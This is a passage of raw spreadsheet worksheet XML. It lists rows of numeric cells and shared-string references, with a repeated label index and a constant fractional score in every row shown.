      </c>
      <c r="B30764" s="2">
        <v>2.7978953E7</v>
      </c>
      <c r="C30764" s="2" t="s">
        <v>29580</v>
      </c>
      <c r="D30764" s="2">
        <v>1.0</v>
      </c>
      <c r="E30764" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30764" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30765" ht="15.75" customHeight="1">
      <c r="A30765" s="1">
        <v>1674.0</v>
      </c>
      <c r="B30765" s="2">
        <v>2.8335054E7</v>
      </c>
      <c r="C30765" s="2" t="s">
        <v>29581</v>
      </c>
      <c r="D30765" s="2">
        <v>1.0</v>
      </c>
      <c r="E30765" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30765" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30766" ht="15.75" customHeight="1">
      <c r="A30766" s="1">
        <v>1871.0</v>
      </c>
      <c r="B30766" s="2">
        <v>2.9618949E7</v>
      </c>
      <c r="C30766" s="2" t="s">
        <v>29582</v>
      </c>
      <c r="D30766" s="2">
        <v>1.0</v>
      </c>
      <c r="E30766" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30766" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30767" ht="15.75" customHeight="1">
      <c r="A30767" s="1">
        <v>2211.0</v>
      </c>
      <c r="B30767" s="2">
        <v>3.2076561E7</v>
      </c>
      <c r="C30767" s="2" t="s">
        <v>29583</v>
      </c>
      <c r="D30767" s="2">
        <v>1.0</v>
      </c>
      <c r="E30767" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30767" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30768" ht="15.75" customHeight="1">
      <c r="A30768" s="1">
        <v>2374.0</v>
      </c>
      <c r="B30768" s="2">
        <v>3.3246166E7</v>
      </c>
      <c r="C30768" s="2" t="s">
        <v>29584</v>
      </c>
      <c r="D30768" s="2">
        <v>1.0</v>
      </c>
      <c r="E30768" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30768" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30769" ht="15.75" customHeight="1">
      <c r="A30769" s="1">
        <v>2758.0</v>
      </c>
      <c r="B30769" s="2">
        <v>3.5103425E7</v>
      </c>
      <c r="C30769" s="2" t="s">
        <v>29585</v>
      </c>
      <c r="D30769" s="2">
        <v>1.0</v>
      </c>
      <c r="E30769" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30769" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30770" ht="15.75" customHeight="1">
      <c r="A30770" s="1">
        <v>2808.0</v>
      </c>
      <c r="B30770" s="2">
        <v>3.5347371E7</v>
      </c>
      <c r="C30770" s="2" t="s">
        <v>29586</v>
      </c>
      <c r="D30770" s="2">
        <v>1.0</v>
      </c>
      <c r="E30770" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30770" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30771" ht="15.75" customHeight="1">
      <c r="A30771" s="1">
        <v>3270.0</v>
      </c>
      <c r="B30771" s="2">
        <v>3.7468415E7</v>
      </c>
      <c r="C30771" s="2" t="s">
        <v>29587</v>
      </c>
      <c r="D30771" s="2">
        <v>1.0</v>
      </c>
      <c r="E30771" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30771" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30772" ht="15.75" customHeight="1">
      <c r="A30772" s="1">
        <v>3562.0</v>
      </c>
      <c r="B30772" s="2">
        <v>3.8859872E7</v>
      </c>
      <c r="C30772" s="2" t="s">
        <v>29588</v>
      </c>
      <c r="D30772" s="2">
        <v>1.0</v>
      </c>
      <c r="E30772" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30772" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30773" ht="15.75" customHeight="1">
      <c r="A30773" s="1">
        <v>3678.0</v>
      </c>
      <c r="B30773" s="2">
        <v>3.945675E7</v>
      </c>
      <c r="C30773" s="2" t="s">
        <v>29589</v>
      </c>
      <c r="D30773" s="2">
        <v>1.0</v>
      </c>
      <c r="E30773" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30773" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30774" ht="15.75" customHeight="1">
      <c r="A30774" s="1">
        <v>3739.0</v>
      </c>
      <c r="B30774" s="2">
        <v>3.968841E7</v>
      </c>
      <c r="C30774" s="2" t="s">
        <v>29590</v>
      </c>
      <c r="D30774" s="2">
        <v>1.0</v>
      </c>
      <c r="E30774" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30774" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30775" ht="15.75" customHeight="1">
      <c r="A30775" s="1">
        <v>4035.0</v>
      </c>
      <c r="B30775" s="2">
        <v>4.1019587E7</v>
      </c>
      <c r="C30775" s="2" t="s">
        <v>29591</v>
      </c>
      <c r="D30775" s="2">
        <v>1.0</v>
      </c>
      <c r="E30775" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30775" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30776" ht="15.75" customHeight="1">
      <c r="A30776" s="1">
        <v>4036.0</v>
      </c>
      <c r="B30776" s="2">
        <v>4.1019587E7</v>
      </c>
      <c r="C30776" s="2" t="s">
        <v>29592</v>
      </c>
      <c r="D30776" s="2">
        <v>1.0</v>
      </c>
      <c r="E30776" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30776" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30777" ht="15.75" customHeight="1">
      <c r="A30777" s="1">
        <v>4205.0</v>
      </c>
      <c r="B30777" s="2">
        <v>4.1665235E7</v>
      </c>
      <c r="C30777" s="2" t="s">
        <v>29593</v>
      </c>
      <c r="D30777" s="2">
        <v>1.0</v>
      </c>
      <c r="E30777" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30777" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30778" ht="15.75" customHeight="1">
      <c r="A30778" s="1">
        <v>4326.0</v>
      </c>
      <c r="B30778" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C30778" s="2" t="s">
        <v>29594</v>
      </c>
      <c r="D30778" s="2">
        <v>1.0</v>
      </c>
      <c r="E30778" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30778" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30779" ht="15.75" customHeight="1">
      <c r="A30779" s="1">
        <v>4332.0</v>
      </c>
      <c r="B30779" s="2">
        <v>4.2051888E7</v>
      </c>
      <c r="C30779" s="2" t="s">
        <v>29594</v>
      </c>
      <c r="D30779" s="2">
        <v>1.0</v>
      </c>
      <c r="E30779" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30779" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30780" ht="15.75" customHeight="1">
      <c r="A30780" s="1">
        <v>5049.0</v>
      </c>
      <c r="B30780" s="2">
        <v>4.4330206E7</v>
      </c>
      <c r="C30780" s="2" t="s">
        <v>29595</v>
      </c>
      <c r="D30780" s="2">
        <v>1.0</v>
      </c>
      <c r="E30780" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30780" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30781" ht="15.75" customHeight="1">
      <c r="A30781" s="1">
        <v>5170.0</v>
      </c>
      <c r="B30781" s="2">
        <v>4.4751794E7</v>
      </c>
      <c r="C30781" s="2" t="s">
        <v>29596</v>
      </c>
      <c r="D30781" s="2">
        <v>1.0</v>
      </c>
      <c r="E30781" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30781" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30782" ht="15.75" customHeight="1">
      <c r="A30782" s="1">
        <v>5220.0</v>
      </c>
      <c r="B30782" s="2">
        <v>4.4967826E7</v>
      </c>
      <c r="C30782" s="2" t="s">
        <v>29597</v>
      </c>
      <c r="D30782" s="2">
        <v>1.0</v>
      </c>
      <c r="E30782" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30782" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30783" ht="15.75" customHeight="1">
      <c r="A30783" s="1">
        <v>5356.0</v>
      </c>
      <c r="B30783" s="2">
        <v>4.536738E7</v>
      </c>
      <c r="C30783" s="2" t="s">
        <v>29598</v>
      </c>
      <c r="D30783" s="2">
        <v>1.0</v>
      </c>
      <c r="E30783" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30783" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30784" ht="15.75" customHeight="1">
      <c r="A30784" s="1">
        <v>5436.0</v>
      </c>
      <c r="B30784" s="2">
        <v>4.5592334E7</v>
      </c>
      <c r="C30784" s="2" t="s">
        <v>29599</v>
      </c>
      <c r="D30784" s="2">
        <v>1.0</v>
      </c>
      <c r="E30784" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30784" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30785" ht="15.75" customHeight="1">
      <c r="A30785" s="1">
        <v>5512.0</v>
      </c>
      <c r="B30785" s="2">
        <v>4.5840978E7</v>
      </c>
      <c r="C30785" s="2" t="s">
        <v>29600</v>
      </c>
      <c r="D30785" s="2">
        <v>1.0</v>
      </c>
      <c r="E30785" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30785" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30786" ht="15.75" customHeight="1">
      <c r="A30786" s="1">
        <v>6087.0</v>
      </c>
      <c r="B30786" s="2">
        <v>4.7685691E7</v>
      </c>
      <c r="C30786" s="2" t="s">
        <v>29601</v>
      </c>
      <c r="D30786" s="2">
        <v>1.0</v>
      </c>
      <c r="E30786" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30786" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30787" ht="15.75" customHeight="1">
      <c r="A30787" s="1">
        <v>6234.0</v>
      </c>
      <c r="B30787" s="2">
        <v>4.807582E7</v>
      </c>
      <c r="C30787" s="2" t="s">
        <v>29602</v>
      </c>
      <c r="D30787" s="2">
        <v>1.0</v>
      </c>
      <c r="E30787" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30787" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30788" ht="15.75" customHeight="1">
      <c r="A30788" s="1">
        <v>6254.0</v>
      </c>
      <c r="B30788" s="2">
        <v>4.8105197E7</v>
      </c>
      <c r="C30788" s="2" t="s">
        <v>29603</v>
      </c>
      <c r="D30788" s="2">
        <v>1.0</v>
      </c>
      <c r="E30788" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30788" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30789" ht="15.75" customHeight="1">
      <c r="A30789" s="1">
        <v>7184.0</v>
      </c>
      <c r="B30789" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C30789" s="2" t="s">
        <v>29604</v>
      </c>
      <c r="D30789" s="2">
        <v>1.0</v>
      </c>
      <c r="E30789" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30789" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30790" ht="15.75" customHeight="1">
      <c r="A30790" s="1">
        <v>7333.0</v>
      </c>
      <c r="B30790" s="2">
        <v>5.092632E7</v>
      </c>
      <c r="C30790" s="2" t="s">
        <v>29605</v>
      </c>
      <c r="D30790" s="2">
        <v>1.0</v>
      </c>
      <c r="E30790" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30790" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30791" ht="15.75" customHeight="1">
      <c r="A30791" s="1">
        <v>7888.0</v>
      </c>
      <c r="B30791" s="2">
        <v>5.2440959E7</v>
      </c>
      <c r="C30791" s="2" t="s">
        <v>29606</v>
      </c>
      <c r="D30791" s="2">
        <v>1.0</v>
      </c>
      <c r="E30791" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30791" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30792" ht="15.75" customHeight="1">
      <c r="A30792" s="1">
        <v>7889.0</v>
      </c>
      <c r="B30792" s="2">
        <v>5.2442677E7</v>
      </c>
      <c r="C30792" s="2" t="s">
        <v>29607</v>
      </c>
      <c r="D30792" s="2">
        <v>1.0</v>
      </c>
      <c r="E30792" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30792" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30793" ht="15.75" customHeight="1">
      <c r="A30793" s="1">
        <v>7940.0</v>
      </c>
      <c r="B30793" s="2">
        <v>5.2617833E7</v>
      </c>
      <c r="C30793" s="2" t="s">
        <v>29608</v>
      </c>
      <c r="D30793" s="2">
        <v>1.0</v>
      </c>
      <c r="E30793" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30793" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30794" ht="15.75" customHeight="1">
      <c r="A30794" s="1">
        <v>8222.0</v>
      </c>
      <c r="B30794" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C30794" s="2" t="s">
        <v>29609</v>
      </c>
      <c r="D30794" s="2">
        <v>1.0</v>
      </c>
      <c r="E30794" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30794" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30795" ht="15.75" customHeight="1">
      <c r="A30795" s="1">
        <v>8623.0</v>
      </c>
      <c r="B30795" s="2">
        <v>5.4289921E7</v>
      </c>
      <c r="C30795" s="2" t="s">
        <v>29610</v>
      </c>
      <c r="D30795" s="2">
        <v>1.0</v>
      </c>
      <c r="E30795" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30795" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30796" ht="15.75" customHeight="1">
      <c r="A30796" s="1">
        <v>8645.0</v>
      </c>
      <c r="B30796" s="2">
        <v>5.434348E7</v>
      </c>
      <c r="C30796" s="2" t="s">
        <v>29611</v>
      </c>
      <c r="D30796" s="2">
        <v>1.0</v>
      </c>
      <c r="E30796" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30796" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30797" ht="15.75" customHeight="1">
      <c r="A30797" s="1">
        <v>8718.0</v>
      </c>
      <c r="B30797" s="2">
        <v>5.4472713E7</v>
      </c>
      <c r="C30797" s="2" t="s">
        <v>29612</v>
      </c>
      <c r="D30797" s="2">
        <v>1.0</v>
      </c>
      <c r="E30797" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30797" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30798" ht="15.75" customHeight="1">
      <c r="A30798" s="1">
        <v>9276.0</v>
      </c>
      <c r="B30798" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C30798" s="2" t="s">
        <v>29613</v>
      </c>
      <c r="D30798" s="2">
        <v>1.0</v>
      </c>
      <c r="E30798" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30798" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30799" ht="15.75" customHeight="1">
      <c r="A30799" s="1">
        <v>9350.0</v>
      </c>
      <c r="B30799" s="2">
        <v>5.5665447E7</v>
      </c>
      <c r="C30799" s="2" t="s">
        <v>29614</v>
      </c>
      <c r="D30799" s="2">
        <v>1.0</v>
      </c>
      <c r="E30799" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30799" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30800" ht="15.75" customHeight="1">
      <c r="A30800" s="1">
        <v>9574.0</v>
      </c>
      <c r="B30800" s="2">
        <v>5.6063117E7</v>
      </c>
      <c r="C30800" s="2" t="s">
        <v>29615</v>
      </c>
      <c r="D30800" s="2">
        <v>1.0</v>
      </c>
      <c r="E30800" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30800" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30801" ht="15.75" customHeight="1">
      <c r="A30801" s="1">
        <v>10334.0</v>
      </c>
      <c r="B30801" s="2">
        <v>5.7716955E7</v>
      </c>
      <c r="C30801" s="2" t="s">
        <v>29616</v>
      </c>
      <c r="D30801" s="2">
        <v>1.0</v>
      </c>
      <c r="E30801" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30801" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30802" ht="15.75" customHeight="1">
      <c r="A30802" s="1">
        <v>10551.0</v>
      </c>
      <c r="B30802" s="2">
        <v>1.2667183E7</v>
      </c>
      <c r="C30802" s="2" t="s">
        <v>29617</v>
      </c>
      <c r="D30802" s="2">
        <v>1.0</v>
      </c>
      <c r="E30802" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30802" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30803" ht="15.75" customHeight="1">
      <c r="A30803" s="1">
        <v>10703.0</v>
      </c>
      <c r="B30803" s="2">
        <v>1.4906126E7</v>
      </c>
      <c r="C30803" s="2" t="s">
        <v>29618</v>
      </c>
      <c r="D30803" s="2">
        <v>1.0</v>
      </c>
      <c r="E30803" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30803" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30804" ht="15.75" customHeight="1">
      <c r="A30804" s="1">
        <v>10824.0</v>
      </c>
      <c r="B30804" s="2">
        <v>1.5886947E7</v>
      </c>
      <c r="C30804" s="2" t="s">
        <v>29619</v>
      </c>
      <c r="D30804" s="2">
        <v>1.0</v>
      </c>
      <c r="E30804" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30804" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30805" ht="15.75" customHeight="1">
      <c r="A30805" s="1">
        <v>10898.0</v>
      </c>
      <c r="B30805" s="2">
        <v>1.660219E7</v>
      </c>
      <c r="C30805" s="2" t="s">
        <v>29620</v>
      </c>
      <c r="D30805" s="2">
        <v>1.0</v>
      </c>
      <c r="E30805" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30805" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30806" ht="15.75" customHeight="1">
      <c r="A30806" s="1">
        <v>11036.0</v>
      </c>
      <c r="B30806" s="2">
        <v>1.8002712E7</v>
      </c>
      <c r="C30806" s="2" t="s">
        <v>29621</v>
      </c>
      <c r="D30806" s="2">
        <v>1.0</v>
      </c>
      <c r="E30806" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30806" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30807" ht="15.75" customHeight="1">
      <c r="A30807" s="1">
        <v>11378.0</v>
      </c>
      <c r="B30807" s="2">
        <v>2.1418559E7</v>
      </c>
      <c r="C30807" s="2" t="s">
        <v>29622</v>
      </c>
      <c r="D30807" s="2">
        <v>1.0</v>
      </c>
      <c r="E30807" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30807" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30808" ht="15.75" customHeight="1">
      <c r="A30808" s="1">
        <v>11445.0</v>
      </c>
      <c r="B30808" s="2">
        <v>2.1772111E7</v>
      </c>
      <c r="C30808" s="2" t="s">
        <v>29623</v>
      </c>
      <c r="D30808" s="2">
        <v>1.0</v>
      </c>
      <c r="E30808" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30808" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30809" ht="15.75" customHeight="1">
      <c r="A30809" s="1">
        <v>11579.0</v>
      </c>
      <c r="B30809" s="2">
        <v>2.2821319E7</v>
      </c>
      <c r="C30809" s="2" t="s">
        <v>29624</v>
      </c>
      <c r="D30809" s="2">
        <v>1.0</v>
      </c>
      <c r="E30809" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30809" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30810" ht="15.75" customHeight="1">
      <c r="A30810" s="1">
        <v>11589.0</v>
      </c>
      <c r="B30810" s="2">
        <v>2.2892262E7</v>
      </c>
      <c r="C30810" s="2" t="s">
        <v>29625</v>
      </c>
      <c r="D30810" s="2">
        <v>1.0</v>
      </c>
      <c r="E30810" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30810" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30811" ht="15.75" customHeight="1">
      <c r="A30811" s="1">
        <v>11766.0</v>
      </c>
      <c r="B30811" s="2">
        <v>2.4201036E7</v>
      </c>
      <c r="C30811" s="2" t="s">
        <v>29626</v>
      </c>
      <c r="D30811" s="2">
        <v>1.0</v>
      </c>
      <c r="E30811" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30811" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30812" ht="15.75" customHeight="1">
      <c r="A30812" s="1">
        <v>12042.0</v>
      </c>
      <c r="B30812" s="2">
        <v>2.6325597E7</v>
      </c>
      <c r="C30812" s="2" t="s">
        <v>29627</v>
      </c>
      <c r="D30812" s="2">
        <v>1.0</v>
      </c>
      <c r="E30812" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30812" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30813" ht="15.75" customHeight="1">
      <c r="A30813" s="1">
        <v>12290.0</v>
      </c>
      <c r="B30813" s="2">
        <v>2.8248136E7</v>
      </c>
      <c r="C30813" s="2" t="s">
        <v>29628</v>
      </c>
      <c r="D30813" s="2">
        <v>1.0</v>
      </c>
      <c r="E30813" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30813" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30814" ht="15.75" customHeight="1">
      <c r="A30814" s="1">
        <v>12529.0</v>
      </c>
      <c r="B30814" s="2">
        <v>2.9757216E7</v>
      </c>
      <c r="C30814" s="2" t="s">
        <v>29629</v>
      </c>
      <c r="D30814" s="2">
        <v>1.0</v>
      </c>
      <c r="E30814" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30814" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30815" ht="15.75" customHeight="1">
      <c r="A30815" s="1">
        <v>12676.0</v>
      </c>
      <c r="B30815" s="2">
        <v>3.0608598E7</v>
      </c>
      <c r="C30815" s="2" t="s">
        <v>29630</v>
      </c>
      <c r="D30815" s="2">
        <v>1.0</v>
      </c>
      <c r="E30815" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30815" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30816" ht="15.75" customHeight="1">
      <c r="A30816" s="1">
        <v>12844.0</v>
      </c>
      <c r="B30816" s="2">
        <v>3.1762864E7</v>
      </c>
      <c r="C30816" s="2" t="s">
        <v>29631</v>
      </c>
      <c r="D30816" s="2">
        <v>1.0</v>
      </c>
      <c r="E30816" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30816" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30817" ht="15.75" customHeight="1">
      <c r="A30817" s="1">
        <v>12993.0</v>
      </c>
      <c r="B30817" s="2">
        <v>3276037.0</v>
      </c>
      <c r="C30817" s="2" t="s">
        <v>29632</v>
      </c>
      <c r="D30817" s="2">
        <v>1.0</v>
      </c>
      <c r="E30817" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30817" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30818" ht="15.75" customHeight="1">
      <c r="A30818" s="1">
        <v>13046.0</v>
      </c>
      <c r="B30818" s="2">
        <v>3.3133345E7</v>
      </c>
      <c r="C30818" s="2" t="s">
        <v>29633</v>
      </c>
      <c r="D30818" s="2">
        <v>1.0</v>
      </c>
      <c r="E30818" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30818" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30819" ht="15.75" customHeight="1">
      <c r="A30819" s="1">
        <v>13190.0</v>
      </c>
      <c r="B30819" s="2">
        <v>3.4080355E7</v>
      </c>
      <c r="C30819" s="2" t="s">
        <v>29634</v>
      </c>
      <c r="D30819" s="2">
        <v>1.0</v>
      </c>
      <c r="E30819" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30819" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30820" ht="15.75" customHeight="1">
      <c r="A30820" s="1">
        <v>13201.0</v>
      </c>
      <c r="B30820" s="2">
        <v>3.4131437E7</v>
      </c>
      <c r="C30820" s="2" t="s">
        <v>29635</v>
      </c>
      <c r="D30820" s="2">
        <v>1.0</v>
      </c>
      <c r="E30820" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30820" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30821" ht="15.75" customHeight="1">
      <c r="A30821" s="1">
        <v>13403.0</v>
      </c>
      <c r="B30821" s="2">
        <v>3.4996019E7</v>
      </c>
      <c r="C30821" s="2" t="s">
        <v>29636</v>
      </c>
      <c r="D30821" s="2">
        <v>1.0</v>
      </c>
      <c r="E30821" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30821" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30822" ht="15.75" customHeight="1">
      <c r="A30822" s="1">
        <v>13983.0</v>
      </c>
      <c r="B30822" s="2">
        <v>3.7356346E7</v>
      </c>
      <c r="C30822" s="2" t="s">
        <v>29637</v>
      </c>
      <c r="D30822" s="2">
        <v>1.0</v>
      </c>
      <c r="E30822" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30822" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30823" ht="15.75" customHeight="1">
      <c r="A30823" s="1">
        <v>14092.0</v>
      </c>
      <c r="B30823" s="2">
        <v>3.7733258E7</v>
      </c>
      <c r="C30823" s="2" t="s">
        <v>29638</v>
      </c>
      <c r="D30823" s="2">
        <v>1.0</v>
      </c>
      <c r="E30823" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30823" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30824" ht="15.75" customHeight="1">
      <c r="A30824" s="1">
        <v>14328.0</v>
      </c>
      <c r="B30824" s="2">
        <v>3.8751663E7</v>
      </c>
      <c r="C30824" s="2" t="s">
        <v>29639</v>
      </c>
      <c r="D30824" s="2">
        <v>1.0</v>
      </c>
      <c r="E30824" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30824" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30825" ht="15.75" customHeight="1">
      <c r="A30825" s="1">
        <v>14348.0</v>
      </c>
      <c r="B30825" s="2">
        <v>3.8882159E7</v>
      </c>
      <c r="C30825" s="2" t="s">
        <v>29640</v>
      </c>
      <c r="D30825" s="2">
        <v>1.0</v>
      </c>
      <c r="E30825" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30825" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30826" ht="15.75" customHeight="1">
      <c r="A30826" s="1">
        <v>14927.0</v>
      </c>
      <c r="B30826" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C30826" s="2" t="s">
        <v>29641</v>
      </c>
      <c r="D30826" s="2">
        <v>1.0</v>
      </c>
      <c r="E30826" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30826" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30827" ht="15.75" customHeight="1">
      <c r="A30827" s="1">
        <v>14982.0</v>
      </c>
      <c r="B30827" s="2">
        <v>4.1391158E7</v>
      </c>
      <c r="C30827" s="2" t="s">
        <v>29642</v>
      </c>
      <c r="D30827" s="2">
        <v>1.0</v>
      </c>
      <c r="E30827" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30827" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30828" ht="15.75" customHeight="1">
      <c r="A30828" s="1">
        <v>15053.0</v>
      </c>
      <c r="B30828" s="2">
        <v>4.1649331E7</v>
      </c>
      <c r="C30828" s="2" t="s">
        <v>29643</v>
      </c>
      <c r="D30828" s="2">
        <v>1.0</v>
      </c>
      <c r="E30828" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30828" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30829" ht="15.75" customHeight="1">
      <c r="A30829" s="1">
        <v>15265.0</v>
      </c>
      <c r="B30829" s="2">
        <v>4232760.0</v>
      </c>
      <c r="C30829" s="2" t="s">
        <v>29644</v>
      </c>
      <c r="D30829" s="2">
        <v>1.0</v>
      </c>
      <c r="E30829" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30829" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30830" ht="15.75" customHeight="1">
      <c r="A30830" s="1">
        <v>15521.0</v>
      </c>
      <c r="B30830" s="2">
        <v>4.3285388E7</v>
      </c>
      <c r="C30830" s="2" t="s">
        <v>29645</v>
      </c>
      <c r="D30830" s="2">
        <v>1.0</v>
      </c>
      <c r="E30830" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30830" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30831" ht="15.75" customHeight="1">
      <c r="A30831" s="1">
        <v>15803.0</v>
